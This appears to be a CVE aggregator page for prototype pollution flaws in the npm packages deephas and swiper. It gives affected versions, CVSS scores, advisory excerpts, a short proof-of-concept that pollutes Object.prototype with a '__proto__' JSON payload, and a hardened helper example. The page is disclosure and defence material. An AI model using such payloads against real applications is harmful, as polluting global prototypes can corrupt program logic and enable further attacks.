CVE-2026-25047
Published 2026-01-29
Priority P354 · high 8.8 (CVSS 3.1)
EPSS 0.72% (49.1th percentile)
deepHas provides a test for the existence of a nested object key and optionally returns that key. A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deephas_project | deephas | >= 0 < 1.0.8 | 1.0.8 |
| sharpred | deephas | < 1.0.7 | 1.0.7 |
| sharpred | deephas | — | — |
| swiperjs | swiper | >= 6.5.1 < 12.1.2 | 12.1.2 |
CVSS provenance
NVD, CVSS v3.1: 8.8 HIGH, vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
NVD, CVSS v4.0: 9.4 CRITICAL, vector CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
GHSA
Prototype pollution in swiper
ghsa·2026-02-19
CVE-2026-27212 [CRITICAL] CWE-1321 Prototype pollution in swiper
Prototype pollution in swiper
### Summary
A prototype pollution vulnerability exists in the npm package swiper (>=6.5.1,
```
let obj = {};
var malicious_payload = '{"__proto__":{"polluted":"yes"}}';
console.log({}.polluted);
swiper.default.extendDefaults(JSON.parse(malicious_payload));
console.log({}.polluted); // prints yes -> indicating that the patch was bypassed and prototype pollution occurred
```
#### Expected behavior
Prototype pollution should be prevented and {} should not gain new properties.
This should be printed on the console:
```
undefined
undefined OR throw an Error
```
#### Actual behavior
Object.prototype is polluted
This is printed on the console:
```
undefined
yes
```
### Impact
This is a prototype pollution vulnerability, which can have severe security implicat
OSV
Prototype pollution in swiper
osv·2026-02-19
CVE-2026-27212 [CRITICAL] Prototype pollution in swiper
GHSA
deepHas vulnerable to Prototype Pollution via constructor.prototype
ghsa·2026-01-29
CVE-2026-25047 [CRITICAL] CWE-1321 deepHas vulnerable to Prototype Pollution via constructor.prototype
deepHas vulnerable to Prototype Pollution via constructor.prototype
### Summary
A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.
### Details
The vulnerability resides in the `add()` function and `indexer()` function implemented within `deepHas.js`. Although version 1.0.7 attempts to prevent prototype pollution by checking property ownership (e.g., using Object.hasOwnProperty) and by checking for forbidden strings (using String.prototype.indexOf), this check can be bypassed as shown in the PoC.
By doing so, an attacker can inject properties into Object.prototype through a payload such as constructor.prototype.polluted or __proto__.polluted resulti
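A hardened nested-key "has" and "set" pair of the kind deepHas provides, as an added example that is not deephas's own code (all function and variable names are assumptions). It rejects the `__proto__`, `constructor` and `prototype` segments outright and only traverses own properties, so neither spelling of the payload above can reach Object.prototype:

```javascript
// Added example, not code from deephas: nested-key "has" and "set" helpers
// hardened against prototype pollution. All names here are assumptions.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  if (v === null || typeof v !== 'object') return false;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

function splitPath(path) {
  const parts = Array.isArray(path) ? path : String(path).split('.');
  if (parts.length === 0 || parts.some((p) => p === '')) {
    throw new TypeError('empty path segment');
  }
  // Reject the segments that lead to Object.prototype, whether spelled
  // "__proto__" or "constructor.prototype".
  for (const p of parts) {
    if (FORBIDDEN.has(p)) throw new TypeError(`forbidden key segment: ${p}`);
  }
  return parts;
}

// true only if every segment is an OWN property of a plain object;
// inherited members such as {}.toString do not count as "present".
function safeHas(obj, path) {
  let cur = obj;
  for (const key of splitPath(path)) {
    if (!isPlainObject(cur) || !Object.prototype.hasOwnProperty.call(cur, key)) {
      return false;
    }
    cur = cur[key];
  }
  return true;
}

// Sets obj[a][b] = value for "a.b". Intermediate containers are created
// with a null prototype, so nothing inherited is ever traversed or written.
function safeSet(obj, path, value) {
  const parts = splitPath(path);
  let cur = obj;
  for (const key of parts.slice(0, -1)) {
    if (!Object.prototype.hasOwnProperty.call(cur, key) || !isPlainObject(cur[key])) {
      cur[key] = Object.create(null);
    }
    cur = cur[key];
  }
  cur[parts[parts.length - 1]] = value;
  return obj;
}
```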
OSV
deepHas vulnerable to Prototype Pollution via constructor.prototype
osv·2026-01-29
CVE-2026-25047 [CRITICAL] deepHas vulnerable to Prototype Pollution via constructor.prototype
No detection rules found.
Published: 2026-01-29